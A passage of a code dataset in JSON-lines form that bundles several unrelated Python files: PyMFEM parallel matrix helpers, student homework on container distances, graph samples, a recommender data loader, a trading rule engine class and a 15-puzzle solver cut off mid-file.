ensure_hypreread(V):\n if V is None:\n return\n if not V._hypreread_called:\n V.HypreRead()\n\n import mfem.par as mfem\n R_A, I_A = A\n R_B, I_B = B\n\n for V in (R_A, I_A, R_B, I_B):\n ensure_hypreread(V)\n\n if I_A is None and I_B is None:\n return mfem.InnerProduct(R_A, R_B)\n elif I_A is None:\n r = mfem.InnerProduct(R_A, R_B)\n i = mfem.InnerProduct(R_A, I_B)\n elif I_B is None:\n r = mfem.InnerProduct(R_A, R_B)\n i = mfem.InnerProduct(I_A, R_B)\n else:\n r = mfem.InnerProduct(R_A, R_B) - mfem.InnerProduct(I_A, I_B)\n i = mfem.InnerProduct(R_A, I_B) + mfem.InnerProduct(I_A, R_B)\n return r + 1j * i\n\n\ndef ParAdd(A, B):\n '''\n add HypreParCSR\n\n '''\n col_starts = A.GetColPartArray() # ; col_starts[2] = A.N()\n return ToHypreParCSR((ToScipyCoo(A) + ToScipyCoo(B)).tocsr(),\n col_starts=col_starts)\n\n\ndef ParMultVecComplex(A, v):\n '''\n A*v\n '''\n import mfem.par as mfem\n from mpi4py import MPI\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n R_A, I_A = A\n R_v, I_v = v\n\n # Take Row partitioning of A for output\n if R_A is not None:\n part = R_A.GetRowPartArray()\n elif I_A is not None:\n part = I_A.GetRowPartArray()\n else:\n return (None, None)\n\n ans_r = ToHypreParVec(np.zeros(part[1]-part[0]))\n if I_A is None and I_v is None:\n R_A.Mult(R_v, ans_r)\n return (ans_r, None)\n else:\n ans_i = ToHypreParVec(np.zeros(part[1]-part[0]))\n\n if I_A is None:\n R_A.Mult(R_v, ans_r)\n R_A.Mult(I_v, ans_i)\n elif I_v is None:\n R_A.Mult(R_v, ans_r)\n I_A.Mult(R_v, ans_i)\n else:\n ans_r2 = ToHypreParVec(np.zeros(part[1]-part[0]))\n ans_i2 = ToHypreParVec(np.zeros(part[1]-part[0]))\n R_A.Mult(R_v, ans_r)\n I_A.Mult(I_v, ans_r2)\n ans_r -= ans_r2\n\n R_A.Mult(I_v, ans_i)\n I_A.Mult(R_v, ans_i2)\n ans_i += ans_i2\n\n return (ans_r, ans_i)\n\n\ndef ParMultComplex(A, B):\n '''\n compute complex mult of hypre real matrices\n\n A = (R_A, I_A)\n B = (R_B, I_B)\n\n (R_A*R_B - I_A*I_B, R_A*I_B + I_A*R_B)\n '''\n from mpi4py import MPI\n import mfem.par as mfem\n\n comm = MPI.COMM_WORLD\n num_proc = MPI.COMM_WORLD.size\n myid = MPI.COMM_WORLD.rank\n\n R_A, I_A = A\n R_B, I_B = B\n\n if I_A is None and I_B is None:\n r = mfem.ParMult(R_A, R_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n\n return (r, None)\n elif I_A is None:\n r = mfem.ParMult(R_A, R_B)\n i = mfem.ParMult(R_A, I_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n i.CopyRowStarts()\n i.CopyColStarts()\n return (r, i)\n\n elif I_B is None:\n r = mfem.ParMult(R_A, R_B)\n i = mfem.ParMult(I_A, R_B)\n r.CopyRowStarts()\n r.CopyColStarts()\n i.CopyRowStarts()\n i.CopyColStarts()\n\n return (r, i)\n else:\n A = mfem.ParMult(R_A, R_B)\n B = mfem.ParMult(I_A, I_B)\n C = mfem.ParMult(R_A, I_B)\n D = mfem.ParMult(I_A, R_B)\n col_starts = A.GetColPartArray() # ; col_starts[2] = A.N()\n r = ToHypreParCSR((ToScipyCoo(A) - ToScipyCoo(B)).tocsr(),\n col_starts=col_starts)\n i = ToHypreParCSR((ToScipyCoo(C) + ToScipyCoo(D)).tocsr(),\n col_starts=col_starts)\n return (r, i)\n\n\ndef TransposeComplex(A):\n '''\n A is tuple (A_real, A_imag), whose real/imag are\n HypreParCSR\n '''\n\n R = A[0].Transpose() if A[0] is not None else None\n I = A[1].Transpose() if A[1] is not None else None\n if R is not None:\n R.thisown = True\n if I is not None:\n I.thisown = True\n return (R, I)\n\n\ndef Conj(A):\n\n R = A[0]\n I = A[1]\n if I is None:\n return A\n col_starts = I.GetColPartArray()\n col_starts[2] = I.N()\n I = ToHypreParCSR(-ToScipyCoo(I).tocsr(), col_starts=col_starts)\n return (R, I)\n\n\ndef RapComplex(A, B):\n '''\n Bt * A * B\n\n for complex A and B\n '''\n X = ParMultComplex(A, B)\n return ParMultComplex(Conj(TransposeComplex(B)), X)\n\n\ndef Array2HypreVec(v, partitioning=None, rank=0):\n '''\n convert array in rank (default = 0) to \n distributed Hypre 1D Matrix (size = m x 1)\n '''\n from mpi4py import MPI\n comm = MPI.COMM_WORLD\n myid = comm.Get_rank()\n\n data = v if myid == rank else None\n data = comm.bcast(data, root=rank)\n\n if partitioning is None:\n start_row, end_row, nrows = get_assumed_patitioning(len(data))\n else:\n start_row = partitioning[myid]\n end_row = partitioning[myid+1]\n nrows = end_row - start_row\n\n from scipy.sparse import csr_matrix, coo_matrix\n v = np.ascontiguousarray(data[start_row:end_row].flatten())\n return ToHypreParVec(v)\n #m = csr_matrix(np.array(d).reshape(-1,1), shape=(nrows,1), dtype='float')\n # return ToHypreParCSR(m)\n\n\ndef HypreVec2Array(V, copy=True):\n '''\n convert HypreParVec to 1D array \n on rank = 0\n '''\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n data = V.GetDataArray()\n if copy:\n data = data.copy()\n\n rcounts = len(data)\n\n rcounts = MPI.COMM_WORLD.gather(rcounts, root=0)\n cm = np.hstack((0, np.cumsum(rcounts)))\n disps = list(cm[:-1])\n recvdata = None\n senddata = [data, data.shape[0]]\n\n if myid == 0:\n length = cm[-1]\n recvbuf = np.empty([length], dtype='float')\n recvdata = [recvbuf, rcounts, disps, MPI.DOUBLE]\n else:\n recvdata = [None, rcounts, disps, MPI.DOUBLE]\n recvbuf = None\n\n MPI.COMM_WORLD.Gatherv(senddata, recvdata, root=0)\n if myid == 0:\n MPI.COMM_WORLD.Barrier()\n return np.array(recvbuf)\n MPI.COMM_WORLD.Barrier()\n return None\n\n\ndef ResetHypreDiag(M, idx, value=1.0):\n '''\n set diagonal element to value (normally 1)\n '''\n col_starts = M.GetColPartArray()\n\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n try:\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tolil()\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n idx = np.array(idx, dtype=int, copy=False)\n ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n mat[ii-ilower, ii] = value\n # for ii in idx:\n # if ii >= ilower and ii <= iupper:\n # mat[ii-ilower, ii] = value\n\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ResetHypreRow(M, idx):\n '''\n set row 0.0\n '''\n col_starts = M.GetColPartArray() # ; col_starts[2] = M.N()\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n\n k = np.in1d(irn, idx)\n data[k] = 0.0\n\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tocsr()\n mat.eliminate_zeros()\n\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ResetHypreCol(M, idx):\n '''\n set col zero\n '''\n col_starts = M.GetColPartArray() # ; col_starts[2] = M.N()\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n0 = jupper - jlower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n\n k = np.in1d(jcn, idx)\n data[k] = 0.0\n\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tocsr()\n mat.eliminate_zeros()\n return ToHypreParCSR(mat.tocsr(), col_starts=col_starts)\n\n\ndef ReadHypreDiag(M, idx):\n '''\n get diagonal element\n '''\n col_starts = M.GetColPartArray()\n\n num_rows, ilower, iupper, jlower, jupper, irn, jcn, data = M.GetCooDataArray()\n from mpi4py import MPI\n myid = MPI.COMM_WORLD.rank\n\n m = iupper - ilower + 1\n n = M.N()\n from scipy.sparse import coo_matrix, lil_matrix\n try:\n mat = coo_matrix((data, (irn-ilower, jcn)), shape=(m, n)).tolil()\n except:\n print(\"wrong input\")\n print(num_rows, ilower, iupper, jlower, jupper)\n print(np.min(irn-ilower), np.max(irn-ilower),\n np.min(jcn), np.max(jcn), (m, n))\n raise\n\n idx = np.array(idx, dtype=int, copy=False)\n ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n\n tmp = mat[ii-ilower, ii].toarray().flatten()\n\n #idx = np.arange(ilower, min([iupper+1, n]))\n #ii = idx[np.logical_and(idx >= ilower, idx <= iupper)]\n #tmp = mat[ii-ilower, ii].toarray().flatten()\n\n return tmp\n","repo_name":"mfem/PyMFEM","sub_path":"mfem/common/parcsr_extra.py","file_name":"parcsr_extra.py","file_ext":"py","file_size_in_byte":16104,"program_lang":"python","lang":"en","doc_type":"code","stars":159,"dataset":"github-code","pt":"48"} +{"seq_id":"7792401165","text":"from pyproj import Transformer\nimport json\nimport argparse\n\ndef dist(source :list, finish : list) -> float: # Vzdálenost dvou bodů\n return ((finish[0] - source[0])**2 + (finish[1] - source[1])**2)**0.5\n\ndef is_private_for_adress(can : dict, house_adr : str) -> bool:\n if can['properties']['PRISTUP'] != \"volně\":\n if can['properties']['STATIONNAME'] == house_adr:\n return True\n return False\n\ndef change_coord(adresses : dist) -> None: # Převod souřadnic z WGS84 do jtsk\n wgstojtsk = Transformer.from_crs(4326,5514, always_xy = True)\n for item in adresses['features']:\n item['geometry']['coordinates'] = wgstojtsk.transform(*item['geometry']['coordinates'])\n\ndef dist_calc(bins : list, coord_adr : list, adress : list) -> tuple: # Kontejnery, souřadnice, číslo\n min_dist = None\n id_number = None\n for can in bins: \n if is_private_for_adress(can, adress):\n min_dist = 0\n id_number = can['properties']['ID'] \n break\n if can['properties']['PRISTUP'] == \"volně\":\n coord_bin = can['geometry']['coordinates']\n distance = dist(coord_adr, coord_bin)\n if min_dist == None or min_dist > distance:\n min_dist = distance\n id_number = can['properties']['ID'] \n return min_dist, id_number\n \ndef update_stat(adress : list, item : dict, max_dist : float, sum : float, distance : float) -> tuple:\n sum += distance\n if max_dist <= distance:\n max_dist = distance\n adress = [item['properties']['addr:street'], item['properties']['addr:housenumber']]\n return adress, max_dist, sum, distance\n\ndef write_file_with_ID(adresses : dict) -> None:\n with open(\"adresy_kontejnery.geojson\", \"w\", encoding = 'utf-8') as write_json:\n json.dump(adresses, write_json, ensure_ascii = False, indent = 2)\n\ndef median_calc(dist_array : list, counter : int) -> int:\n dist_array.sort()\n median = 0\n if counter%2 == 1:\n median = dist_array[counter//2]\n else:\n median = (dist_array[counter//2 - 1] + dist_array[counter//2])/2\n return median\n\ndef process(adresses : dist, bins : dist) -> tuple:\n suma = 0\n min_distance = 0\n dist_array = []\n adress = None\n counter = 0\n max_dist = 0\n median = 0\n id_number = 0\n for item in adresses['features']:\n coord_adr = item['geometry']['coordinates']\n house_adr = f\"{item['properties']['addr:street']} {item['properties']['addr:housenumber']}\"\n counter += 1\n min_distance, id_number = dist_calc(bins['features'], coord_adr, house_adr)\n if min_distance >= 10000:\n raise SystemExit(\">> Minimální vzdálenost přesáhla stanovený limit (10 km). Program byl ukončen.\")\n item['kontejner'] = id_number\n dist_array.append(min_distance)\n adress, max_dist, suma, min_distance = update_stat(adress, item, max_dist, suma, min_distance)\n # Zápis do souboru adresy_kontejnery.geojson\n write_file_with_ID(adresses)\n # Výpočet mediánu\n median = median_calc(dist_array, counter)\n return suma/counter, median, adress, max_dist\n\ndef file_open(file_name : str) -> dict:\n try:\n with open(file_name, \"r\", encoding = 'utf-8') as file:\n dictionary = json.load(file)\n return dictionary\n except FileNotFoundError:\n raise SystemExit(f\">> Soubor s názvem <{file_name}> neexistuje.\")\n except PermissionError:\n raise SystemExit(f\">> Ke čtení souboru s názvem <{file_name}> nemáte práva.\")\n\ntry:\n adresses = None # slovník s adresami\n bins = None # slovník s kontejnery\n far_adress = None # Adresa, z které je to ke kontejneru nejdále\n average = 0 # Průměrná minimální vzdálenost\n # Parametry programu\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-a\",\"--adress\", action = \"store\", dest = \"adr\", default = \"adresy.geojson\")\n parser.add_argument(\"-k\",\"--container\", action = \"store\", dest = \"cont\", default = 'kontejnery.geojson')\n arguments = parser.parse_args()\n\n adresses = file_open(arguments.adr)\n bins = file_open(arguments.cont) \n\n print(f\"Počet načtených adres: {len(adresses['features']):.0f}\")\n print(f\"Počet načtených kontejnerů: {len(bins['features']):.0f}\")\n # Převod WGS84 na S-JTSK\n change_coord(adresses)\n \n if not len(bins['features']) or not len(adresses['features']):\n print(\">> nebyly načteny žádné adresy nebo žádné veřejné kontejnery, program byl ukončen.\")\n else:\n average, median, far_adress, max_dist = process(adresses, bins)\n print(f\"Prumerná minimální vzdalenost ke kontejneru je {round(average, 0):.0f} m.\")\n print(f\"Medián minimálních vzdáleností ke kontejnerům je {round(median, 0):.0f} m.\")\n print(f\"Nejdále ke kontejneru je z adresy {far_adress[0]} {far_adress[1]} a to {round(max_dist, 0):.0f} m.\")\nexcept KeyError:\n print(\">> Klíč nebyl ve slovníku nalezen.\")\nexcept ValueError:\n print(\">> Špatný formát vstupu.\")\nexcept SystemExit as sysErr:\n print(sysErr)\n","repo_name":"simamarti/Uvod_do_programovani_I","sub_path":"du_3/du_3.py","file_name":"du_3.py","file_ext":"py","file_size_in_byte":5179,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"39122029692","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\nx = np.linspace(-10.0, 10.0, 1000)\n\ny1 = (1.0 / np.sqrt(2.0 * np.pi)) * np.exp( -1.0 * np.power(x, 2) / 2.0)\ny2 = (1.0 / (2.0 * np.sqrt(np.pi))) * np.exp( -1.0 * np.power(x - 1, 2) / 4.0)\n\nplt.plot(x, y1, label=\"P(x|w1)\")\nplt.plot(x, y2, label=\"P(x|w2)\")\nplt.title('Class conditional PDF (1-2-b)')\nplt.xlabel('x')\nplt.ylabel('P(x|wi)')\nplt.grid('on')\nplt.legend()\nplt.show()\n\nz1 = y1 / (y1 + y2)\nz2 = y2 / (y1 + y2)\n\nplt.plot(x, z1, label=\"P(w1|x)\")\nplt.plot(x, z2, label=\"P(w2|x)\")\nplt.title('P(wi|x) (1-2-b)')\nplt.xlabel('x')\nplt.ylabel('P(wi|x)')\nplt.grid('on')\nplt.legend()\nplt.show()","repo_name":"zzy1993/ml","sub_path":"hw1/code/my1-2-b.py","file_name":"my1-2-b.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11381089818","text":"def multiplicado(*args):\n lista = []\n total = 1\n try:\n for numbers in range(len(args)):\n lista.append(int(args[numbers]))\n\n for i in range(len(lista)):\n if lista[i] == 0:\n continue\n total *= lista[i]\n par_or_impar = 'Par' if (total % 2 == 0) else 'Ímpar'\n print('Sua multiplicação deu: {t} e ele é: {pi}'.format(t = total, pi = par_or_impar))\n except:\n print('Digite apenas números! ')\n\nmultiplicado(1, 3, 0, 5, 1, 9)","repo_name":"filipe-golves-dev/me-tornando-um-programador","sub_path":"Estudos Python/2 - Python Intermediário /Resumos/4 - Args/aula113_args.py","file_name":"aula113_args.py","file_ext":"py","file_size_in_byte":517,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"23335180821","text":"# graph samples\n\nimport networkx as nx\nimport matplotlib.pyplot as plt\n\n\nclass SampleGraph():\n def __init__(self):\n self.data = []\n self.nodes = 'ABC'\n self.edges = [\n ('A', 'B'), ('A', 'C')]\n self.pos = {\n 'A': (1, 1.5),\n 'B': (2, 1),\n 'C': (2, 2)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n\n def Get_Networkx_Graph(self):\n if self.G is None:\n self.G = nx.Graph()\n self.G.add_nodes_from(self.nodes)\n self.G.add_edges_from(self.edges)\n return(self.G)\n\n def Draw_Networkx_Graph(self):\n nx.draw_networkx_nodes(self.G, self.pos, node_color='grey', node_size=500, alpha=0.8)\n nx.draw_networkx_labels(self.G, self.pos, labels=self.labels, font_size=16)\n nx.draw_networkx_edges(self.G, self.pos, width=1.5, alpha=0.5, edge_color='g')\n plt.show()\n return\n\n\nclass graph1(SampleGraph):\n\n def __init__(self):\n SampleGraph.__init__(self)\n self.data = []\n self.nodes = 'ABCDEFGHIJ'\n self.edges = [\n ('A', 'B'), ('A', 'E'),\n ('B', 'F'),\n ('C', 'G'),\n ('D', 'E'), ('D', 'H'),\n ('E', 'H'),\n ('F', 'G'), ('F', 'J'), ('F', 'I'),\n ('G', 'J'),\n ('H', 'I'),\n # ('I')\n # ('J')\n ]\n\n self.pos = {\n 'A': (2, 3),\n 'B': (3, 3),\n 'C': (4, 3),\n 'D': (1, 2),\n 'E': (2, 2),\n 'F': (3, 2),\n 'G': (4, 2),\n 'H': (1.5, 1),\n 'I': (2.5, 1),\n 'J': (3.5, 1)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n\n def Draw_Networkx_Graph(self):\n # node_color (color string, or array of floats) – Node color. Can be a single color format string (default=’r’),\n # or a sequence of colors with the same length as nodelist. If numeric values are specified they will be mapped\n # to colors using the cmap and vmin,vmax parameters. See matplotlib.scatter for more details.\n\n # can add nodelist to work with subset of nodes\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('ABCD'), node_color='red', node_size=500, alpha=0.8)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('EFGH'), node_color='blue', node_size=500, alpha=0.8)\n nx.draw_networkx_nodes(self.G, self.pos, nodelist=list('IJ'), node_color='grey', node_size=500, alpha=0.8)\n\n # add labels to nodes\n nx.draw_networkx_labels(self.G, self.pos, labels=self.labels, font_size=16)\n\n # add edges\n nx.draw_networkx_edges(self.G, self.pos, width=1.5, alpha=0.5, edge_color='g')\n return\n\n\nif __name__ == '__main__':\n print('sample graph')\n\n\nclass closeness_centrality_graph(SampleGraph):\n def __init__(self):\n self.data = []\n self.nodes = 'ABCDE'\n self.edges = [\n ('A', 'B'), ('B', 'C'), ('C', 'D'), ('D', 'E')]\n self.pos = {\n 'A': (1, 1),\n 'B': (2, 1),\n 'C': (3, 1),\n 'D': (4, 1),\n 'E': (5, 1)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n\n\nclass at1q3(SampleGraph): \n def __init__(self): \n SampleGraph.__init__(self)\n self.data = []\n self.nodes = 'ABCDEFG'\n self.edges = [\n ('A','G'), ('A','F'),('A','E'),('A','D'),\n ('B','F'), ('B','E'),('B','D'),('B','C'),\n ('C','E'),('C','D'),\n ('D','E'),\n ('E','F'),('E','G'),\n ('F','G')\n #('G')\n ]\n self.pos = {\n 'A': (1,1), \n 'B': (3,2),\n 'C': (3,1), \n 'D': (2,1), \n 'E': (2,2),\n 'F': (2,3), \n 'G': (1,2)\n }\n self.labels = {c: f'${c}$' for i, c in enumerate(self.nodes)}\n self.G = None\n","repo_name":"mutazag/sina","sub_path":"helpers/samples.py","file_name":"samples.py","file_ext":"py","file_size_in_byte":4032,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"48"} +{"seq_id":"41813355717","text":"\"\"\"\nLøsningsforslag\nØving 2 - Oppgave 3\n\n@author: Thomas Nyborg\n\"\"\"\n\ndef pytTrip(a,b,c):\n sider = [a,b,c]\n sider.sort()\n \n return(sider[0]**2 + sider[1]**2 == sider[2]**2)\n\n\na = int(input(\"Side 1?\"))\nb = int(input(\"Side 2?\"))\nc = int(input(\"Side 3?\"))\n\nif pytTrip(a,b,c):\n print(\"Huzzah! Dette er et Pytagoreisk trippel.\")\n\nelse:\n print(\"NOPE. Dette er et ikke et Pytagoreisk trippel.\")\n","repo_name":"newboarg/ProgModX-20-21","sub_path":"LF_ov2_oppg3.py","file_name":"LF_ov2_oppg3.py","file_ext":"py","file_size_in_byte":407,"program_lang":"python","lang":"da","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23254497104","text":"'''\r\nCreated on 25 Nov 2017\r\n\r\n@author: RCLEGG2@BLOOMBERG.NET\r\n\r\n'''\r\nimport logging\r\nfrom dataset import DataSet\r\nfrom ruleset import RuleSet\r\nfrom action import Action\r\n\r\nclass RuleMSX:\r\n \r\n def __init__(self,lvl=logging.CRITICAL):\r\n self.setLogLevel(lvl)\r\n #logging.logger = logging.getLogger(__name__)\r\n\r\n logging.info(\"Initializing sets\")\r\n \r\n self.ruleSets = {}\r\n self.dataSets = {}\r\n self.actions = {}\r\n \r\n def setLogLevel(self,lvl):\r\n logging.basicConfig(level=lvl)\r\n\r\n def createDataSet(self,name):\r\n \r\n logging.info(\"Creating DataSet: \" + name)\r\n\r\n if(name is None or name == \"\"):\r\n raise ValueError(\"DataSet name cannot be none or empty\")\r\n \r\n ds = DataSet(name)\r\n self.dataSets[name] = ds\r\n\r\n logging.info(\"Created DataSet: \" + name)\r\n \r\n return ds\r\n\r\n \r\n \r\n def createRuleSet(self,name):\r\n \r\n logging.info(\"Creating RuleSet: \" + name)\r\n\r\n if(name is None or name == \"\"):\r\n raise ValueError(\"RuleSet name cannot be none or empty\")\r\n \r\n rs = RuleSet(name)\r\n self.ruleSets[name] = rs\r\n\r\n logging.info(\"Created RuleSet: \" + name)\r\n \r\n return rs\r\n\r\n \r\n def createAction(self,name, executor):\r\n \r\n logging.info(\"Creating Action: \" + name)\r\n \r\n if(name is None or name == \"\"):\r\n raise ValueError(\"Action name cannot be none or empty\")\r\n \r\n a = Action(name,executor)\r\n self.actions[name] = a\r\n\r\n logging.info(\"Created Action: \" + name)\r\n\r\n return a\r\n \r\n \r\n def stop(self):\r\n \r\n logging.info(\"Stopping RuleMSX\")\r\n \r\n result = True\r\n \r\n for rs in self.ruleSets.values():\r\n if not rs.stop(): result = False\r\n \r\n logging.info(\"Stopped RuleMSX\")\r\n\r\n return result\r\n \r\n__copyright__ = \"\"\"\r\nCopyright 2017. Bloomberg Finance L.P.\r\n\r\nPermission is hereby granted, free of charge, to any person obtaining a copy\r\nof this software and associated documentation files (the \"Software\"), to\r\ndeal in the Software without restriction, including without limitation the\r\nrights to use, copy, modify, merge, publish, distribute, sublicense, and/or\r\nsell copies of the Software, and to permit persons to whom the Software is\r\nfurnished to do so, subject to the following conditions: The above\r\ncopyright notice and this permission notice shall be included in all copies\r\nor substantial portions of the Software.\r\n\r\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\r\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\r\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\r\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\r\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING\r\nFROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS\r\nIN THE SOFTWARE.\r\n\"\"\"\r\n","repo_name":"rikclegg/old_py_RuleMSX","sub_path":"rulemsx.py","file_name":"rulemsx.py","file_ext":"py","file_size_in_byte":3081,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17330323554","text":"# -*- coding: utf-8 -*-\nwhile True:\n n = input()\n if n == \"*\":\n break\n n = n.split()\n s = 0\n for i in range(len(n)-1):\n if n[i][:1].upper() == n[i+1][:1].upper():\n s = 1\n else:\n s = 0\n if s == 0:\n print(\"N\")\n else:\n print(\"Y\")\n","repo_name":"ThiagoCComelli/URI-Online-Judge","sub_path":"URI-py/1140.py","file_name":"1140.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"19893266781","text":"#-*-coding:utf-8-*-\n'''\nauthor:zhanglianzhong\ndate:20190907\n'''\n\nimport os\nimport pandas as pd\n\ndef get_item_info(input_file):\n '''\n get item info\n Args:\n input_file: input file path\n return: a dict. key itemId,value [title,genres]\n '''\n if not os.path.exists(input_file):\n return {}\n df = pd.read_csv(input_file)\n result = {}\n for index,line in df.iterrows():\n if len(line)<3:\n continue\n [itemId,title,genres] = line\n itemId = float(itemId)\n if itemId not in result.keys():\n result[itemId]=[title,genres]\n\n return result\n\n\n\ndef get_average_score(input_file):\n '''\n get every item average score\n Args:\n input_file: input file path\n return: a dict. key itemId,value average score.\n '''\n record_dict = {}\n average_score ={}\n if not os.path.exists(input_file):\n return {}\n df = pd.read_csv(input_file)\n for index,line in df.iterrows():\n movieId = line['movieId']\n if movieId not in record_dict.keys():\n record_dict[movieId]=[0,0]\n record_dict[movieId][0] +=1\n record_dict[movieId][1] +=line['rating']\n\n for movieId in record_dict:\n average_score[movieId]=round(record_dict[movieId][1]/record_dict[movieId][0],3)\n\n return average_score\n\n\ndef get_train_data(input_file):\n '''\n get train data\n Args:\n input_file: ratings file path\n return: a list [(userid,itemid,lable),(, ,)]\n '''\n if not os.path.exists(input_file):\n return []\n neg_dict = {}\n pos_dict = {}\n threshold = 4\n train_data =[]\n average_score = get_average_score(input_file)\n ratings_data = pd.read_csv(input_file)\n for index,line in ratings_data.iterrows():\n userid,itemid,rating = line['userId'],line['movieId'],line['rating']\n if userid not in pos_dict:\n pos_dict[userid] =[]\n if userid not in neg_dict:\n neg_dict[userid] =[]\n #如果大于阈值,给lable 1。否则,给0,这里存储的是平均分\n if rating >= threshold:\n pos_dict[userid].append((itemid,1))\n else:\n score = average_score[itemid]\n neg_dict[userid].append((itemid,score))\n\n #正负样本均衡和负采样\n for userid in pos_dict:\n data_num = min(len(pos_dict[userid]),len(neg_dict[userid]))\n if data_num > 0:\n train_data += [(userid,zuhe[0],zuhe[1]) for zuhe in pos_dict[userid][0:data_num]]\n else:\n continue\n sorted_neg_list = sorted(neg_dict[userid],key=lambda element:element[1],reverse=True)[0:data_num]\n train_data += [(userid,zuhe[0],0 ) for zuhe in sorted_neg_list]\n\n return train_data\n\n\n\n\n\n\n\nif __name__ == '__main__':\n movies_file ='../data/ml-latest-small/movies.csv'\n ratings_file ='../data/ml-latest-small/ratings.csv'\n item_info = get_item_info(movies_file)\n average_score = get_average_score(ratings_file)\n print(item_info[1])\n print(average_score[1])\n data_train =get_train_data(ratings_file)\n print(data_train[2])\n\n","repo_name":"zhanglianzhong/Recommendation","sub_path":"LFM/util/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":3084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387928114","text":"from collections import defaultdict\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\nnames = defaultdict(bool)\nfor i in range(n):\n data = input().strip().split()\n if data[1] == 'enter':\n names[data[0]] = True\n elif data[1] == 'leave':\n names[data[0]] = False\n\nfor name, res in sorted(names.items(), key=lambda x: x[0], reverse=True):\n if res:\n print(name)","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/7785/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17295627849","text":"import copy\nfrom time import perf_counter_ns\n\n#Fungsi dengan parameter matriks puzzle dan mengembalikan boolean apakah sebuah puzzle dapat diselesaikan atau tidak\n#Di dalam fungsi ini juga akan mencetak fungsi Kurang(i) dan Nilai Sigma(Kurang(i))+X\ndef ReachableGoal(a) :\n kurang = [0 for i in range (16)]\n for i in range (16) :\n if (a[i] == \"X\") :\n idxEmp = i\n temp = 16\n else :\n temp = int(a[i])\n for j in range (i+1, 16) :\n if(a[j] == \"X\"):\n temp2 = 16\n else :\n temp2 = int(a[j])\n if(temp > temp2) :\n kurang[temp-1] += 1\n for i in range (16) :\n print(\"Kurang (\"+ str(i+1)+ \") =\", kurang[i])\n print()\n if ((idxEmp+1)%2 == ((idxEmp)//4+1)%2) :\n print(\"Nilai Sigma(Kurang(i))+X =\", sum(kurang))\n print()\n return (sum(kurang)%2 == 0)\n else :\n print(\"Nilai Sigma(Kurang(i))+X =\", (sum(kurang)+1))\n print()\n return ((sum(kurang)+1)%2 == 0)\n\n#Fungsi dengan parameter matriks puzzle dan mencetak puzzle ke layar\ndef PrintPuzzle(a) :\n for i in range (4) :\n for j in range (4) :\n print(a[i][j], end=\" \")\n print()\n\n#Fungsi dengan parameter matriks puzzle dan mengembalikan posisi X (ubin kosong) dengan nilai X antara 1 hingga 16\ndef LocX(a) :\n for i in range (4) :\n for j in range (4) :\n if (a[i][j] == \"X\") :\n return (i*4)+j+1\n\n#Fungsi dengan parameter matriks puzzle dan char dir serta mengembalikan boolean apakah sebuah puzzle ubin kosongnya dapat di geser ke arah 